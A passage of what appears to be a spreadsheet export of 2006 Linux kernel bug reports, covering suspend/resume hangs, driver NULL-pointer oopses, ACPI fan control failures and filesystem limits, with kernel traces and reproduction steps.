Aug 26 19:25:01 (none) kernel: [&lt;c0117250&gt;] default_wake_function+0x0/0x20 Aug 26 19:25:01 (none) kernel: [&lt;c0117250&gt;] default_wake_function+0x0/0x20 Aug 26 19:25:01 (none) kernel: [&lt;c012dd30&gt;] worker_thread+0x0/0x180 Aug 26 19:25:01 (none) kernel: [&lt;c013192d&gt;] kthread+0xbd/0x100 Aug 26 19:25:01 (none) kernel: [&lt;c0131870&gt;] kthread+0x0/0x100 Aug 26 19:25:01 (none) kernel: [&lt;c0101225&gt;] kernel_thread_helper+0x5/0x10 Aug 26 19:25:01 (none) kernel: Code: 55 08 5d e9 ce da ff ff 8d b4 26 00 00 00 00 8d bc 27 00 00 00 00 55 89 e5 57 56 53 83 ec 14 8b 45 08 8b 7d 10 8b 50 04 83 c0 04 &lt;8b&gt; 32 39 d0 89 45 f0 eb 49 89 f6 8b 5a f4 8d 42 f4 8b 55 18 89 Steps to reproduce:</t>
  </si>
  <si>
    <t>SIS630: Old IDE driver does not support swsusp</t>
  </si>
  <si>
    <t>2.6.21.x</t>
  </si>
  <si>
    <t>2006-08-30 02:55 UTC</t>
  </si>
  <si>
    <t>when i try to suspend my notebook i have problems with ide controller. the copy lasts a lot and i get oops with 2.6.17 kernel. Stopping tasks: ==========================================| Shrinking memory... done (22776 pages freed) pnp: Device 00:08 disabled. swsusp: Need to copy 30898 pages ACPI: PCI Interrupt 0000:00:00.1[A]: no GSI - using IRQ 14 eth0: Media Link Off ACPI: PCI Interrupt 0000:00: 01.2[D] -&gt; Link [LNKD] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ACPI: PCI Interrupt 0000:00:01.3[D] -&gt; Link [LNKD] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ACPI: PCI Interrupt 0000:00:01.4[B] -&gt; Link [LNKB] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ACPI: PCI Interrupt 0000:00:01.6[B] -&gt; Link [LNKB] -&gt; GSI 5 (level, low) -&gt; IRQ 5 PCI: Setting latency timer of device 0000:00:02.0 to 64 PM: Writing back config space on device 0000:00:0a.0 at offset 1 (was 82100003, writing 82100007) ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 PM: Writing back config space on device 0000:00:0a.1 at offset 1 (was 2100003, writing 82100007) ACPI: PCI Interrupt 0000:00: 0a.1[B] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 pnp: Device 00:08 activated. pnp: Failed to activate device 00:0c. pnp: Failed to activate device 00:0d. irq 14: nobody cared (try booting with the "irqpoll" option) &lt;c012c987&gt; __report_bad_irq+0x2b/0x69 &lt;c012cb3d&gt; note_interrupt+0x178/0x1a7 &lt;c012c53d&gt; handle_IRQ_event+0x22/0x4e &lt;c012c5ce&gt; __do_IRQ+0x65/0x8f &lt;c0104b2d&gt; do_IRQ+0x19/0x24 &lt;c01033da&gt; common_interrupt+0x1a/0x20 &lt;c0118f4b&gt; __do_softirq+0x2c/0x7f &lt;c0118fc0&gt; do_softirq+0x22/0x26 &lt;c0104b32&gt; do_IRQ+0x1e/0x24 &lt;c01033da&gt; common_interrupt+0x1a/0x20 &lt;c0214224&gt; acpi_processor_idle+0x157/0x323 &lt;c0101da2&gt; cpu_idle+0x3a/0x4f &lt;c03b0635&gt; start_kernel+0x29c/0x29e handlers: [&lt;c0230301&gt;] (ide_intr+0x0/0x16c) Disabling IRQ #14 Restarting tasks... done hda: dma_timer_expiry: dma status == 0x24 hda: DMA interrupt recovery hda: lost interrupt tried 2.6.18-rc4-mm3 (as suggested by Rafael J. Wysocki) as soon as i ask for suspending i get a black screen. waiting for lots of time...something like 1 min i see: Disabling Interrupt #14 and after, even waiting some mins...nothing more. i have to power off manually. tried 2.6.18-rc5 i immediatly have a Disabling Interrupt #14 message (instead of waiting like mm3) but i get a panic too (i'll try to attach a photo of that) seems related to synapsis driver....maybe input team should be CC. CPU0 0: 431861 XT-PIC timer 1: 638 XT-PIC i8042 2: 0 XT-PIC cascade 5: 0 XT-PIC yenta, ohci_hcd:usb1, ohci_hcd:usb2, Trident Audio, SiS630, eth0 7: 0 XT-PIC parport0 8: 2 XT-PIC rtc 9: 1 XT-PIC acpi 11: 0 XT-PIC yenta 12: 10982 XT-PIC i8042 14: 200771 XT-PIC ide0 15: 26 XT-PIC ide1 NMI: 0 LOC: 0 ERR: 0 MIS: 0 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 630 Host (rev 11) 00:00.1 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) 00:01.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) 00:01.1 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 80) 00:01.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 00:01.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 00:01.4 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS PCI Audio Accelerator (rev 01) 00:01.6 Modem: Silicon Integrated Systems [SiS] AC'97 Modem Controller (rev a0) 00:02.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) 00:0a.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev 80) 00:0a.1 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev 80) 01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 630/730 PCI/AGP VGA Display Adapter (rev 11)</t>
  </si>
  <si>
    <t>powerbook sluggish after update from 2.6.18-rc4 to rc5</t>
  </si>
  <si>
    <t>2006-08-30 04:27 UTC</t>
  </si>
  <si>
    <t>markusr815</t>
  </si>
  <si>
    <t>2006-08-31 01:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18-rc4 Distribution: Gentoo Linux Hardware Environment: PowerBook6,2 Software Environment: Problem Description: after I have updated from 2.6.18-rc4 to rc5 the machine behaves very 'sluggish'. Programms take ages to start or don't even start. For example if I start an KDE application the "sand glass" in the task entry does nothing. normaly it twists, but with rc5 it does nothing and the application does not start. well.. difficult to describe I guess. I wish I could get into a console to see if something eats up my cpu, but konsole does not start within 2-3 minutes... even CTRL+ALT+F1 does nothing. Steps to reproduce: update from rc4 to rc5 and use your powerbook.. ;-)</t>
  </si>
  <si>
    <t>Log messages duplicates to console</t>
  </si>
  <si>
    <t>2006-08-30 09:33 UTC</t>
  </si>
  <si>
    <t>2006-10-15 07:44 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17 Distribution: Gentoo Hardware Environment: Software Environment: syslog-ng 1.6.9 Problem Description: After using 2.6.18-rc5 for while, I saw that some message that in 2.6.17 go to /var/log/*, in 2.6.18-rc5 go also to console. For example, I have such iptables rule: iptables -A INPUT -p tcp -j LOG --log-prefix "UNMATCHED TCP packet: " and such syslog-ng rule: destination security { file("/var/log/security"); }; filter f_security { facility(security) or match("UNMATCHED TCP... log { source(src); filter(f_security); destination(security); }; in 2.6.17 these message just go to /var/log/security in 2.6.18-rc5 they are also duplicates to current console, this is really annoing. Steps to reproduce:</t>
  </si>
  <si>
    <t>suspend with ne2k-pci hangs</t>
  </si>
  <si>
    <t>2006-08-30 10:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.11 Distribution: mandriva 2007.0 beta 2 Hardware Environment: Desktop box based on ASUS A7V133-C motherboard (VIA chipset), Athlon XP 1600+, Realtek RTL-8029(AS) PCI Ethernet controller. Software Environment: Problem Description: 2.6.17.11 suspends and resumes successfully even with high network activity. 2.6.18-rc1 and later kernels hang when suspending during network activity. They're stuck just after "swsusp: Critical section: done". When I wait a few minutes, a "Soft lockup" exception occurs. I must shut down network and unload ne2k-pci and 8390 modules in order to suspend/resume reliably. This regression is due to git commit 53e4d30dd666d7f83598957ee4a415eefb47c9a6. (see http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=53e4d30dd666d7f83598957ee4a415eefb47c9a6). Reverting this patch on 2.6.18-rc4-mm3 made me able to suspend/resume during network activity without shutting down network. Steps to reproduce: - boot to runlevel 1 - set up network (service network start). ifconfig looks like this: # ifconfig eth0 Link encap:Ethernet HWaddr 00:40:95:46:6E:2D inet adr:192.168.0.3 Bcast:192.168.0.255 Masque:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 ... lo Link encap:Boucle locale inet adr:127.0.0.1 Masque:255.0.0.0 ... - echo 5 &gt; /proc/sys/kernel/printk - echo reboot &gt; /sys/power/disk - echo disk &gt; /sys/power/start</t>
  </si>
  <si>
    <t>Bus ID value not unique in some dsdt, causing sysfs file conflicts</t>
  </si>
  <si>
    <t>2006-09-01 16:23 UTC</t>
  </si>
  <si>
    <t>2008-06-13 20:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: n/a Distribution: FC6-test2 with kernel.org kernel Hardware Environment: Lenovo X60 laptop with ultrabase Problem Description: In acpi_device_get_busid the ACPI_SINGLE_NAME value is used as the bus_id value, which is then used as kobj-&gt;name. This value is not unique on the X60 when the SATA controller is placed in compatibility mode, causing problems if you want to write an acpi driver for one of said SATA devices. Steps to reproduce:</t>
  </si>
  <si>
    <t>pata_sis NULL pointer deference on insmod</t>
  </si>
  <si>
    <t>2.6.18-rc5-mm1</t>
  </si>
  <si>
    <t>2006-09-02 04:10 UTC</t>
  </si>
  <si>
    <t>2007-06-05 08:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Never worked on this hw Distribution: Ark Linux dockyard-devel Hardware Environment: MSI Hermes 650 (old revision) Software Environment: Inside initramfs while booting Ark Linux dockyard-devel Problem Description: pata_sis crashes on loading on MSI Hermes 650 boxes with this BUG message: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: cc00d099 *pde = 00000000 Oops: 0002 [#1] 4K_STACKS last sysfs file: Modules linked in: pata_sis CPU: 0 EIP: 0060:[&lt;cc88d899&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.18-rc5-mm1 #1) EIP is at 0xcc88d899 eax: 00000000 ebx: 00000000 ecx: 00000054 edx: 00000cfc esi: cc00f6d0 edi: cbf96400 ebp: c12273e0 esp: c124ddd4 ds: 007b es: 007b ss: 0068 Process insmod (pid: 228, ti=c124d000 task=c122f030 task.ti=c124d000) Stack: 00000000 00000015 00000054 00000000 00000000 5513f558 cc80f558 cbf96400 cc80f520 c01e766e cbf96400 cc00ddc0 cbf96448 cbf96448 cc80f558 c02432c0 cbf96448 c02433b7 cbfef0c0 000000d0 cbf96448 c124de54 c024347f cc80f558 Call Trace: [&lt;c01e766e&gt;] pci_device_probe+0x51/0x74 [&lt;c02432e8&gt;] really_probe+0x32/0xc3 [&lt;c02433b7&gt;] driver_probe_device+0x3e/0x96 [&lt;c024347f&gt;] __driver_attack+0x0/0x69 [&lt;c02434e6&gt;] __driver_attach+0x67/0x69 [&lt;c0242c5c&gt;] bus_for_each_dev+0x58/0x77 [&lt;c02431fc&gt;] driver_attach+0x26/0x2a [&lt;c024347f&gt;] __driver_attach+0x0/0x69 [&lt;c02426e0&gt;] bus_add_driver+0x6c/0x1a5 [&lt;c02436f4&gt;] driver_register+0x5e/0x95 [&lt;c01e7814&gt;] __pci_register_driver+0x69/0x9 [&lt;cc811017&gt;] init_module+0x17/0x1b [pata_sis] [&lt;c013278b&gt;] sys_init_module+0x118/0x186d [&lt;c0254f3b&gt;] ata_port_start+0x0/0x96 [&lt;c8102edf&gt;] syscall_call+0x7/0xb =================== Code: 44 24 04 c7 04 24 39 10 00 00 e8 10 a5 9d f3 89 c3 85 c0 74 d0 66 81 3e 38 86 0f 84 4c 02 00 00 89 1c 24 e8 20 9d 9d f3 8b 5e 04 &lt;89&gt; 73 18 8b 46 04 3d 18 f7 80 cc 8f 84 ae 01 00 00 3d 2c f7 80 EIP: [&lt;cc88d899&gt;] 0xcc88d899 SS:ESP 0060:c124ddd4 lspci's take on the IDE controller is: 00:02.5 0101: 1039:5513 (rev d0) (prog-if 80) Subsystem: 1462:5350 Flags: bus master, fast devsel, latency 128 I/O ports at ff00 [size=16]</t>
  </si>
  <si>
    <t>UDF limited size of file</t>
  </si>
  <si>
    <t>2006-09-02 13:10 UTC</t>
  </si>
  <si>
    <t>tomek</t>
  </si>
  <si>
    <t>2007-06-06 00:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.4 Distribution: Debian sid Hardware Environment: Software Environment: gcc (GCC) 4.1.2 20060729 (prerelease) (Debian 4.1.1-10) ; mkudffs 1.0.0b2 for UDF FS 1.0.0-cvs, 2002/02/09 ; mount: mount-2.12r ; loop-aes-utils 2.12r-13 ; Linux terminal1 2.6.17.11 #1 PREEMPT Fri Sep 1 16:13:21 CEST 2006 i686 GNU/Linux Problem Description: Can't write file larger than 1048866kB , it is only 23% of all area. Steps to reproduce: create big file : dd if=/dev/zero of=udf_file bs=47000 count=100000 make udf file system : mkudffs udf_file mount udf_file /mnt/file -o loop try copy/create large file on udf file system : cp &lt;big file more than 1GB&gt; /mnt/file |or| dd if=/dev/zero /mnt/file/big bs=47000 count=90000</t>
  </si>
  <si>
    <t>openpromfs on 2.6.18-rc stop working</t>
  </si>
  <si>
    <t>2.6.18-rc6</t>
  </si>
  <si>
    <t>2006-09-06 13:28 UTC</t>
  </si>
  <si>
    <t>2008-03-30 00:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.11 Distribution: Debian Sarge Hardware Environment: Sun E250 Software Environment: Sarge Problem Description: When I try change input device or another prom config param I get Invalid argument and kernel returns EINVAL. The same think on 2.6.17.2 works Steps to reproduce: echo "keyboard' &gt; /proc/openprom/options/input-device Inavlid argument</t>
  </si>
  <si>
    <t>raw1394: ARM requests call sleeping functions in atomic context</t>
  </si>
  <si>
    <t>2006-09-07 12:02 UTC</t>
  </si>
  <si>
    <t>2006-10-01 15:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown (kernel used was actually 2.6.17.11 plus 1394 driver updates from end of August 2006) Problem Description: Some of libraw1394's ARM related requests cause raw1394 to call sleeping functions while interrupts are disabled. This leads to warnings (I suppose if the kernel was compiled with sleep-inside-spinlock checking) or to lockups if the sleeping functions actually need to sleep. Sep 7 20:47:50 shuttle kernel: BUG: sleeping function called from invalid context at arch/i386/lib/usercopy.c:607 Sep 7 20:47:50 shuttle kernel: in_atomic():1, irqs_disabled():1 Sep 7 20:47:50 shuttle kernel: &lt;c011a4b1&gt; __might_sleep+0xa1/0xc0 &lt;c0158967&gt; __vmalloc+0x27/0x30 Sep 7 20:47:50 shuttle kernel: &lt;c01f5371&gt; copy_to_user+0x21/0x80 &lt;f89a58f5&gt; arm_register+0x405/0x4c0 [raw1394] Sep 7 20:47:50 shuttle kernel: &lt;f89a686e&gt; raw1394_write+0xae/0xe0 [raw1394] &lt;c0165fc0&gt; vfs_write+0xd0/0x1e0 Sep 7 20:47:50 shuttle kernel: &lt;c01661a1&gt; sys_write+0x51/0x80 &lt;c010315b&gt; sysenter_past_esp+0x54/0x75 Steps to reproduce: Run any libraw1394 client with ARM handling. The above output occured at startup of Oracle's Endpoint. Actual lockups were reported too: http://article.gmane.org/gmane.linux.kernel.firewire.user/1961</t>
  </si>
  <si>
    <t>EIP is at dv1394_remove_host+0x17/0xad [dv1394]</t>
  </si>
  <si>
    <t>2006-09-08 00:46 UTC</t>
  </si>
  <si>
    <t>Miles Lane</t>
  </si>
  <si>
    <t>2007-02-09 15:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Don't know yet. Distribution: Ubuntu Development (6.06.1 + devel/devel-extras/security updates) Hardware Environment: X86 Laptop (HP Pavillion dv1240us) The ieee1394 pcmcia card is a "Western Digital 1394 Cardbus PC Card", model WDAD003-RNW (The card was made in year 2000) Problem Description: I tried testing the patches from http://groups.google.com/group/linux.kernel/browse_thread/thread/e25d2d810b7cf9cb applied to 2.6.18-rc5-git1. Things went pretty well (I attached a firewire drive and a videocam), until I ran "pccardctl eject" and then popped out the Firewire card. ieee1394: Node changed: 1-02:1023 -&gt; 1-00:1023 ieee1394: Node suspended: ID:BUS[1-00:1023] GUID[0080880002103eae] ieee1394: Node suspended: ID:BUS[1-01:1023] GUID[0090a950000b2255] pccard: card ejected from slot 0 ieee1394: Node removed: ID:BUS[1-00:1023] GUID[0080880002103eae] PM: Removing info for ieee1394:0080880002103eae-0 PM: Removing info for ieee1394:0080880002103eae ieee1394: Node removed: ID:BUS[1-01:1023] GUID[0090a950000b2255] PM: Removing info for ieee1394:0090a950000b2255-0 PM: Removing info for ieee1394:0090a950000b2255 ieee1394: Node removed: ID:BUS[1-00:1023] GUID[0090a94000007475] PM: Removing info for ieee1394:0090a94000007475-0 PM: Removing info for ieee1394:0090a94000007475 BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: f955b309 *pde = 00000000 Oops: 0000 [#1] Modules linked in: dv1394 raw1394 binfmt_misc apm i915 drm ipv6 speedstep_centrino freq_table cpufreq_powersave cpufreq_performance cpufreq_ondemand cpufreq_conservative video thermal processor fan button battery ac nls_ascii nls_cp437 vfat fat nls_utf8 ntfs nls_base sr_mod sbp2 scsi_mod parport_pc lp parport 8139cp pcmcia 8139too ipw2200 sdhci mmc_core ohci1394 ieee1394 yenta_socket rsrc_nonstatic pcmcia_core mii snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss ide_cd snd_pcm snd_timer cdrom psmouse shpchp pci_hotplug snd soundcore snd_page_alloc ehci_hcd uhci_hcd intel_agp agpgart usbcore rtc evdev CPU: 0 EIP: 0060:[&lt;f955b309&gt;] Not tainted VLI EFLAGS: 00010282 (2.6.18-rc5-git1 #4) EIP is at dv1394_remove_host+0x17/0xad [dv1394] eax: f91ac0f4 ebx: 00000001 ecx: 00000000 edx: f955b2f2 esi: 00000000 edi: f955c4d9 ebp: f955d980 esp: eab03e74 ds: 007b es: 007b ss: 0068 Process pccardctl (pid: 7111, ti=eab02000 task=f0a02ab0 task.ti=eab02000) Stack: f955d980 ed5c4000 ed5c4000 f91788c2 00000000 f955d980 ed5c4000 f91310cc f7c0b448 f9178945 ed5c4000 ed5c5d48 f9177e65 ed5c5f64 f912c9f2 f52ae800 f52ae848 f91310cc c10c5d24 f52ae8b0 c111dcbd f52ae848 f52ae848 c11f4aa0 Call Trace: [&lt;f91788c2&gt;] __unregister_host+0x17/0x79 [ieee1394] [&lt;f9178945&gt;] highlevel_remove_host+0x21/0x42 [ieee1394] [&lt;f9177e65&gt;] hpsb_remove_host+0x37/0x56 [ieee1394] [&lt;f912c9f2&gt;] ohci1394_pci_remove+0x41/0x1cd [ohci1394] [&lt;c10c5d24&gt;] pci_device_remove+0x16/0x28 [&lt;c111dcbd&gt;] __device_release_driver+0x5a/0x72 [&lt;c111de8f&gt;] device_release_driver+0x1b/0x29 [&lt;c111d705&gt;] bus_remove_device+0x78/0x8a [&lt;c111c8a7&gt;] device_del+0xe9/0x11a [&lt;c111c8e0&gt;] device_unregister+0x8/0x10 [&lt;c10c3ee5&gt;] pci_remove_bus_device+0x39/0xcf [&lt;c10c3f95&gt;] pci_remove_behind_bridge+0x1a/0x2d [&lt;f910d5ae&gt;] socket_shutdown+0x89/0xdd [pcmcia_core] [&lt;f910d675&gt;] pcmcia_eject_card+0x56/0x65 [pcmcia_core] [&lt;f9110070&gt;] pccard_store_eject+0x19/0x20 [pcmcia_core] [&lt;c111e2e7&gt;] class_device_attr_store+0x1b/0x1f [&lt;c1075495&gt;] sysfs_write_file+0x97/0xbe [&lt;c1044a48&gt;] vfs_write+0xa6/0x14b [&lt;c10452d4&gt;] sys_write+0x3c/0x63 [&lt;c10029a5&gt;] sysenter_past_esp+0x56/0x79 DWARF2 unwinder stuck at sysenter_past_esp+0x56/0x79 Leftover inexact backtrace: Code: c2 ff c7 87 90 01 00 00 00 00 00 00 83 c4 10 5b 5e 5f 5d c3 57 56 53 8b 98 44 1d 00 00 8b 80 3c 1d 00 00 8b 70 04 bf d9 c4 55 f9 &lt;ac&gt; ae 75 08 84 c0 75 f8 31 c0 eb 04 19 c0 0c 01 85 c0 75 7e 9c EIP: [&lt;f955b309&gt;] dv1394_remove_host+0x17/0xad [dv1394] SS:ESP 0068:eab03e74</t>
  </si>
  <si>
    <t>Thermal management problems - HPC nx6325</t>
  </si>
  <si>
    <t>2.6.18-rc5-mm1, 2.6.18-rc6-mm1, 2.6.18-mm2</t>
  </si>
  <si>
    <t>2006-09-08 04:05 UTC</t>
  </si>
  <si>
    <t>2007-03-04 12:17 UTC</t>
  </si>
  <si>
    <t>6978 7194 7227 7259</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown Distribution: SUSE 10.1 Hardware Environment: HPC nx6325 (AMD Turion 64 X2) Software Environment: x86_64, SMP, non-preemptible kernel Problem Description: Fans don't work properly after a resume from disk. Namely, according to ACPI there are four fans in this box, denoted by 34F, 350, 351, and 352. Usually, the 352 fan is always on and the 351 fan is turned on when the temperature reported in TZ1 and TZ2 gets too high (above ~50 C). However, after a resume from disk either all fans are reported to be 'off' and they are never turned on, even if the temperature in TZ1 gets above 70 C, or the 352 fan is reported to be 'on' and the other ones are reported to be 'off', but the 351 fan is actually always on, even if the temperature in TZ1 and TZ2 is well below 45 C. If the kernel is compiled with CONFIG_ACPI_DEBUG=y, the following statements appear in dmesg during the final resume (ie. the resume in the "restored" kernel): acpi acpi: resuming ACPI: Transitioning device [C34F] to D3 ACPI: Transitioning device [C34F] to D3 ACPI: Transitioning device [C350] to D3 ACPI: Transitioning device [C350] to D3 ACPI: Transitioning device [C351] to D3 ACPI: Transitioning device [C351] to D3 ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Exception (dswexec-0458): AE_TIME, While resolving operands for [Store] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.C349] (Node ffff810037a3f490), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.TZ3_._TMP] (Node ffff810037a40458), AE_TIME Steps to reproduce: Suspend to disk and resume.</t>
  </si>
  <si>
    <t>Added Support for Proxim Harmony PCI W-Lan Card (hostap_cs)</t>
  </si>
  <si>
    <t>2006-09-08 14:07 UTC</t>
  </si>
  <si>
    <t>2006-12-01 06:56 UTC</t>
  </si>
  <si>
    <t>For adding support for the proxim harmony pci wlan card (based on Cirrus Logic CL 6729 PCI2PCMCIA Bridge using Modul pd6729) here are 2 tiny patches. hostap_cs.mod.c needs to be patched for generating the proper entry in /lib/modules/&lt;kernelversion&gt;/modules.alias (e.g. for using with coldplug). The modalias is like it appears in my /sys/class/pcmcia_socket/pcmcia_socket0/device/modalias. hostap_cs.c needs to be patched for detecting the card (using manfid). Would be great if this card is supported in the next kernel releases. best regards christian</t>
  </si>
  <si>
    <t>BUG: warning at fs/ext3/inode.c:1016/ext3_getblk()</t>
  </si>
  <si>
    <t>2006-09-09 09:15 UTC</t>
  </si>
  <si>
    <t>Mihail Peltekov</t>
  </si>
  <si>
    <t>2009-01-17 19:42 UTC</t>
  </si>
  <si>
    <t>[1006882.438001] BUG: warning at fs/ext3/inode.c:1016/ext3_getblk() [1006882.438011] &lt;c01ae487&gt; ext3_getblk+0xa3/0x226 &lt;c01bff60&gt; find_revoke_record+0x51/0x7a [1006882.438029] &lt;c01ae61a&gt; ext3_bread+0x10/0x67 &lt;c01b70d5&gt; ext3_quota_read+0x10a/0x185 [1006882.438039] &lt;c017340b&gt; v1_read_dqblk+0x49/0x86 &lt;c017110f&gt; dquot_acquire+0x43/0xc5 [1006882.438049] &lt;c01b6e24&gt; ext3_acquire_dquot+0x42/0x58 &lt;c01719bc&gt; dqget+0x1a2/0x1c9 [1006882.438057] &lt;c0172620&gt; dquot_transfer+0x104/0x383 &lt;c01b0839&gt; ext3_setattr+0xd2/0x1f1 [1006882.438065] &lt;c0160de2&gt; notify_change+0x104/0x21e &lt;c014a84b&gt; chown_common+0x92/0xa4 [1006882.438080] &lt;c01575e5&gt; do_path_lookup+0x1e4/0x1ff &lt;c015781b&gt; __user_walk_fd+0x37/0x3f [1006882.438090] &lt;c014a88f&gt; sys_chown+0x32/0x43 &lt;c015e165&gt; dput+0x2a/0x116 [1006882.438097] &lt;c0161cd4&gt; mntput_no_expire+0x11/0x56 &lt;c01025c3&gt; syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>(patch queued) ibmmtr_cs:seems working as fine with 64bit kernel than with 32bits</t>
  </si>
  <si>
    <t>2006-09-09 12:25 UTC</t>
  </si>
  <si>
    <t>Yves L'ECUYER</t>
  </si>
  <si>
    <t>2008-10-17 11:10 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Core 4 and RedHat EL 4 Hardware Environment: IBM Turbo 16/4 TokenRing PC Card2 Software Environment: kernel 2.6.16 from Fedora updates Problem Description: Why to limitate in drivers/net/pcmcia/Kconfig the usage of ibmtr_cs to 32 bits arch ? In the lines: ---------- config PCMCIA_IBMTR tristate "IBM PCMCIA tokenring adapter support" depends on NET_PCMCIA &amp;&amp; IBMTR!=y &amp;&amp; TR &amp;&amp; PCMCIA &amp;&amp; !64BIT ----------------- I removed with a the limitation "&amp;&amp; !64BIT"; then the module compile fine with few warning, and loads fine with PCMCIA cardmanager service. I noticed than the PC used in stand alone, the TokenRing initialisation abort because the drivers says there is no Ring controller. So I used the RHEL4 with 32 bit kernel, and the corresponding ibmtr_cs, and I got the same message. So the ring controller funtionality seams not implemented in this drivers, but it's not a matter of architecture. Conclusion:I used this drivers during more than 3 weeks now, with a cisco 2504 in the ring (who plays the ring controller role fine), and the communication between my laptop (ASUS A6Q00K with TURION 64bits and Fedora Core 4/kernel 2.6.16-64bits )and the cisco 2504 is fine; protocole tested: ICMP,TCP,UDP,OSPF</t>
  </si>
  <si>
    <t>au600 bugs</t>
  </si>
  <si>
    <t>2006-09-09 14:19 UTC</t>
  </si>
  <si>
    <t>2008-09-22 17:03 UTC</t>
  </si>
  <si>
    <t>Please report bugs regarding the au600 device here http://alsa.opensrc.org/au600</t>
  </si>
  <si>
    <t>Ide driver piix.c does not implement suspend/resume. Resume from ram suspend takes 30+ seconds waiting for HD to spin up - piix.c doesn't implement resume/suspend.</t>
  </si>
  <si>
    <t>2.6.16 and 2.6.18 (probably all)</t>
  </si>
  <si>
    <t>2006-09-09 16:46 UTC</t>
  </si>
  <si>
    <t>Sheer</t>
  </si>
  <si>
    <t>2007-05-30 10:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18-rc3 Distribution: Suse Linux Enterprise Desktop 10 Hardware Environment: Sony Vaio A-190 Laptop (686) Software Environment: Problem Description: I can suspend to ram either using Suse's powersave daemon or from the commandline using s2ram. As a specific example I can use 's2ram -r -f' to suspend my machine. When I hit a key to wake it the screen comes back to life and (when using powersave) some text is displayed (saying processes will be restarted). The machine then sits there for 30 seconds before coming back to life. Also, even after it comes back to life I can use the disk for a few seconds but then suddenly all disk access stalls for another period (10-30 secs, never timed it) and then I can hear the disk whir up and respond again. From the suspend-devel mailing list I found out that most machines resume from a suspend to ram in 2-4 seconds which is definately much more desirable. I have discussed this at length on the suspend mailing list and the developers there believe it is a problem with the piix.c driver and my particular ide chipset (??): http://sourceforge.net/mailarchive/message.php?msg_id=36301041 I tried using 2.6.18-rc3 with a single patch from the mm2 tree: ftp://ftp.kernel.org/pub/linux/kernel/people/akpm/patches/2.6/2.6.18-rc3/2.6.18-rc3-mm2/broken-out/ide-reprogram-disk-pio-timings-on-resume.patch This was supposed to add suspend/resume support at the level of the general ide drivers but it did not resolve my issue. The consensus on the suspend-devel mailing list that this is an ide timeout issue. Steps to reproduce: Run 's2ram -r -f' only any kernel using the piix driver. This might be a bios issue. It might be that my bios is not good at restarting the ide subsystem while others are so this might not show up for every card using the piix driver but it does so on mine. I would be glad to help test any fixes.</t>
  </si>
  <si>
    <t>em28xx - pinnacle hybrid pro remote control</t>
  </si>
  <si>
    <t>2006-09-10 04:36 UTC</t>
  </si>
  <si>
    <t>2006-09-11 13:22 UTC</t>
  </si>
  <si>
    <t>remote control doesn't work yet, if someone could provide a captured windows usb log I can fix this up too. http://linuxtv.org/v4lwiki/index.php/Talk:Em2880#Pinnacle_PCTV_Hybrid_Remote_Control_Troubles</t>
  </si>
  <si>
    <t>Incorrect handling PCI-Express Root Bridge _HID</t>
  </si>
  <si>
    <t>2.6.17.13</t>
  </si>
  <si>
    <t>2006-09-11 02:49 UTC</t>
  </si>
  <si>
    <t>Eiichiro Oiwa</t>
  </si>
  <si>
    <t>2007-01-04 10:44 UTC</t>
  </si>
  <si>
